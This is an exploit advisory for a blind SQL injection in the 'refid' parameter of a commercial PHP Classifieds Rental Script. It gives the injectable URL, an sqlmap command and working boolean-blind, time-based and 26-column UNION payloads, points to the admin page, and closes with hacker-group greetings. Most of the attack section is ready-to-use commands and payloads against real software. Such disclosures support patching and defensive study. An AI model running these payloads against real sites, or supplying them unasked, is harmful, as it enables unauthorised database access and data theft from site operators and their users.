PHP Classifieds Rental Script Blind SQL Injection

2016.10.07
Credit: OoN_Boy
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

[x]========================================================================================================================================[x] | Title : PHP Classifieds Rental Script Blind SQL Vulnerabilities | Software : PHP Classifieds Rental Script | Vendor : http://www.i-netsolution.com/ | Demo : http://www.i-netsolution.com/item/php-classifieds-rental-script/244993 | Date : 06 October 2016 | Author : OoN_Boy [x]========================================================================================================================================[x] [x]========================================================================================================================================[x] | Technology : PHP | Database : MySQL | Price : $ 99 | Description : PHP Classifieds Rental Script The PHP Rental Classifieds Script is one among the limited software's, which are designed so user-friendly that anyone with minimal knowledge of operating a computer can utilize it to its optimum. Besides being an easy-to- use software, this Property Rental Script [x]========================================================================================================================================[x] [x]========================================================================================================================================[x] | Exploit : http://localhost/product_details.php?refid=%Inject_Here%1319258872 | Aadmin Page : http://localhost/[path]/admin/index.php [x]========================================================================================================================================[x] [x]========================================================================================================================================[x] | Proof of concept : sqlmap -u "http://localhost/product_details.php?refid=1319258872" --invalid-string [x]========================================================================================================================================[x] --- Parameter: refid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: refid=1319258872' AND 3912=3912 AND 'HTMi'='HTMi Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: refid=1319258872' OR SLEEP(5) AND 'QwXZ'='QwXZ Type: UNION query Title: MySQL UNION query (NULL) - 26 columns Payload: refid=xCUcyB' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a787671,0x644e6e5046537647684864705a527667796f454c666c4656644a73506d4e627a48574969424a4756,0x7176786271),NULL,NULL,NULL,NULL,NULL# --- [x]========================================================================================================================================[x] [x]========================================================================================================================================[x] | Greetz : antisecurity.org batamhacker.or.id | Vrs-hCk NoGe Jack zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va | k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere [x]========================================================================================================================================[x] [x]========================================================================================================================================[x] | Hi All long time no see ^_^ [x]========================================================================================================================================[x]


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top